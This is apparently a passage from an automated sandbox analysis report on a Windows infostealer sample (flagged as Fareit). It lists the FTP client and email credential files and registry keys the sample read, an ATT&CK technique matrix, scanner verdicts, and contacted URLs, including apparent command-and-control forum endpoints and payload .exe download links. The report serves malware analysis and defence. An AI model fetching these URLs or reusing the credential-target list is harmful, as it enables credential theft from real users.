              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Roaming\BitKinex\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\FileZilla\filezilla.xmlJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\ProgramData\LeapWare\LeapFTP\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\ProgramData\GPSoftware\Directory Opus\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\BitKinex\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings.ccsJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\filezilla.xmlJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: HKEY_CURRENT_USER\Software\AceBITJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Roaming\Estsoft\ALFTP\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\3\History.datJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\ProgramData\FTPInfo\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 9\QCToolbarJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\ProgramData\FileZilla\filezilla.xmlJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\ProgramData\CoffeeCup Software\SharedSettings.ccsJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\ProgramData\BitKinex\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Sites.datJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\ProgramData\SharedSettings_1_0_5.sqliteJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Program Files (x86)\CuteFTP\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\ProgramData\SharedSettings.ccsJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\4\History.datJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.ccsJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\SmartFTP\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\ProgramData\GHISLER\wcx_ftp.iniJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Quick.datJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\ProgramData\FileZilla\recentservers.xmlJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\ExpanDrive\drives.jsJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\ProgramData\BlazeFtp\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\ProgramData\FlashFXP\4\Sites.datJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\ProgramData\INSoftware\NovaFTP\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\ProgramData\FTP Explorer\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\ProgramData\FTPGetter\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings.sqliteJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Roaming\SharedSettings.sqliteJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Program Files (x86)\CuteFTP\sm.datJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\3\Quick.datJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\4\Sites.datJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\sm.datJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\NetSarang\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Roaming\LeapWare\LeapFTP\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\ProgramData\CuteFTP\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: HKEY_LOCAL_MACHINE\Software\WOW6432Node\TurboFTPJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Roaming\CuteFTP\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\ProgramData\SmartFTP\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: HKEY_CURRENT_USER\Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\FileZilla\recentservers.xmlJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\TurboFTP\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Roaming\SharedSettings_1_0_5.ccsJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: HKEY_CURRENT_USER\Software\FTP Explorer\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\ProgramData\Frigate3\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: HKEY_CURRENT_USER\Software\MAS-Soft\FTPInfo\SetupJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Roaming\GHISLER\wcx_ftp.iniJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\SharedSettings_1_0_5.ccsJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\sm.datJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Roaming\AceBIT\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\ProgramData\FileZilla\sitemanager.xmlJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\ProgramData\CoffeeCup Software\SharedSettings.sqliteJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\ProgramData\TurboFTP\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\3\Sites.datJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\sm.datJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\RhinoSoft.com\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\FTP Explorer\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\AceBIT\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP\sm.datJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\ProgramData\FlashFXP\3\Quick.datJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\FTPRush\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\ProgramData\Estsoft\ALFTP\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\sm.datJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\ProgramData\ExpanDrive\drives.jsJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\ProgramData\CuteFTP\sm.datJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\sm.datJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.sqliteJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\4\Quick.datJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\sm.datJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\GPSoftware\Directory Opus\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\ProgramData\FlashFXP\3\Sites.datJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Roaming\SharedSettings_1_0_5.sqliteJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\FileZilla\sitemanager.xmlJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\BlazeFtp\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\sm.datJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbarJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbarJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\FTPGetter\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\ProgramData\SharedSettings.sqliteJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\ProgramData\AceBIT\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.sqliteJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\GHISLER\wcx_ftp.iniJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Windows\32BitFtp.iniJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\sm.datJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\LeapWare\LeapFTP\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Roaming\INSoftware\NovaFTP\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\ProgramData\FlashFXP\4\Quick.datJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xmlJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\ProgramData\3D-FTP\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\Frigate3\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\ProgramData\NetSarang\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbarJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Roaming\GPSoftware\Directory Opus\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\ProgramData\FTPRush\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbarJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\sm.datJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\SharedSettings.sqliteJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\ProgramData\FlashFXP\3\History.datJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Sites.datJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: HKEY_LOCAL_MACHINE\Software\TurboFTPJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Quick.datJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\ProgramData\FlashFXP\4\History.datJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.ccsJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Windows\wcx_ftp.iniJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\sm.datJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.sqliteJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Roaming\RhinoSoft.com\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Roaming\CuteFTP\sm.datJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet SettingsJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeCode function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, PopPassword0_2_0040EE6F
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeCode function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, SmtpPassword0_2_0040EE6F
              Source: Yara matchFile source: Process Memory Space: pbfe2Xcxue.exe PID: 7428, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 0.3.pbfe2Xcxue.exe.a70000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.pbfe2Xcxue.exe.a70000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.pbfe2Xcxue.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: pbfe2Xcxue.exe PID: 7428, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire Infrastructure2
              Valid Accounts
              1
              Native API
              2
              Valid Accounts
              2
              Valid Accounts
              2
              Valid Accounts
              2
              OS Credential Dumping
              1
              Security Software Discovery
              Remote Services1
              Email Collection
              2
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              DLL Side-Loading
              21
              Access Token Manipulation
              1
              Virtualization/Sandbox Evasion
              2
              Credentials in Registry
              1
              Virtualization/Sandbox Evasion
              Remote Desktop Protocol1
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              DLL Side-Loading
              21
              Access Token Manipulation
              Security Account Manager1
              Process Discovery
              SMB/Windows Admin Shares2
              Data from Local System
              2
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Deobfuscate/Decode Files or Information
              NTDS1
              Account Discovery
              Distributed Component Object ModelInput Capture112
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
              Obfuscated Files or Information
              LSA Secrets1
              System Owner/User Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Install Root Certificate
              Cached Domain Credentials3
              File and Directory Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
              Software Packing
              DCSync14
              System Information Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading
              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              pbfe2Xcxue.exe96%ReversingLabsWin32.Infostealer.Fareit
              pbfe2Xcxue.exe76%VirustotalBrowse
              pbfe2Xcxue.exe100%AviraTR/Urausy.310276641
              pbfe2Xcxue.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://https://ftp://operawand.dat_Software0%Avira URL Cloudsafe
              ftp://http://https://ftp.fireFTPsites.datSeaMonkey0%Avira URL Cloudsafe
              http://www.ue-electronics.de/XjwiYdic.exe0%Avira URL Cloudsafe
              http://onecable.ca/forum/viewtopic.php$Z0%Avira URL Cloudsafe
              http://oliviagurun.com/forum/viewtopic.php0%Avira URL Cloudsafe
              http://oliviagurun.com/forum/viewtopic.phphttp://onecable.ca/forum/viewtopic.phphttp://onlyidea.com/0%Avira URL Cloudsafe
              http://onecable.ca/forum/viewtopic.phpH0%Avira URL Cloudsafe
              http://ftp.pexgol.com/bm6dog.exe0%Avira URL Cloudsafe
              http://67.158.38.155/jiKEb8.exe0%Avira URL Cloudsafe
              http://onecable.ca/forum/viewtopic.php0%Avira URL Cloudsafe
              http://aasthakitchen.com/vMTXwWg.exe0%Avira URL Cloudsafe
              http://onlyidea.com/forum/viewtopic.php100%Avira URL Cloudphishing
              http://originalpizzaplus.ca/forum/viewtopic.php0%Avira URL Cloudsafe
              https://login.live.co100%Avira URL Cloudmalware
              NameIPActiveMaliciousAntivirus DetectionReputation
              onecable.ca
              3.33.130.190
              truetrue
                unknown
                oliviagurun.com
                unknown
                unknowntrue
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  http://www.ue-electronics.de/XjwiYdic.exetrue
                  • Avira URL Cloud: safe
                  unknown
                  http://onecable.ca/forum/viewtopic.phptrue
                  • Avira URL Cloud: safe
                  unknown
                  http://ftp.pexgol.com/bm6dog.exetrue
                  • Avira URL Cloud: safe
                  unknown
                  http://67.158.38.155/jiKEb8.exetrue
                  • Avira URL Cloud: safe
                  unknown
                  http://oliviagurun.com/forum/viewtopic.phptrue
                  • Avira URL Cloud: safe
                  unknown
                  http://aasthakitchen.com/vMTXwWg.exetrue
                  • Avira URL Cloud: safe
                  unknown
                  http://onlyidea.com/forum/viewtopic.phptrue
                  • Avira URL Cloud: phishing
                  unknown
                  http://originalpizzaplus.ca/forum/viewtopic.phptrue
                  • Avira URL Cloud: safe
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://https://ftp://operawand.dat_Softwarepbfe2Xcxue.exe, 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://ac.ecosia.org/autocomplete?q=pbfe2Xcxue.exe, 00000000.00000003.1719803091.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719722431.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719510399.000000000059F000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://duckduckgo.com/chrome_newtabpbfe2Xcxue.exe, 00000000.00000003.1719803091.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719722431.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719510399.000000000059F000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      http://onecable.ca/forum/viewtopic.php$Zpbfe2Xcxue.exe, 00000000.00000002.2904373998.000000000052C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://duckduckgo.com/ac/?q=pbfe2Xcxue.exe, 00000000.00000003.1719803091.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719722431.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719510399.000000000059F000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://www.google.com/images/branding/product/ico/googleg_lodp.icopbfe2Xcxue.exe, 00000000.00000003.1719803091.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719722431.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719510399.000000000059F000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          ftp://http://https://ftp.fireFTPsites.datSeaMonkeypbfe2Xcxue.exe, 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.ibsensoftware.com/pbfe2Xcxue.exe, 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpfalse
                            high
                            http://oliviagurun.com/forum/viewtopic.phphttp://onecable.ca/forum/viewtopic.phphttp://onlyidea.com/pbfe2Xcxue.exe, 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchpbfe2Xcxue.exe, 00000000.00000003.1719803091.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719722431.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719510399.000000000059F000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://onecable.ca/forum/viewtopic.phpHpbfe2Xcxue.exe, 00000000.00000002.2904373998.000000000052C000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=pbfe2Xcxue.exe, 00000000.00000003.1719803091.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719722431.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719510399.000000000059F000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=pbfe2Xcxue.exe, 00000000.00000003.1719803091.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719722431.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719510399.000000000059F000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
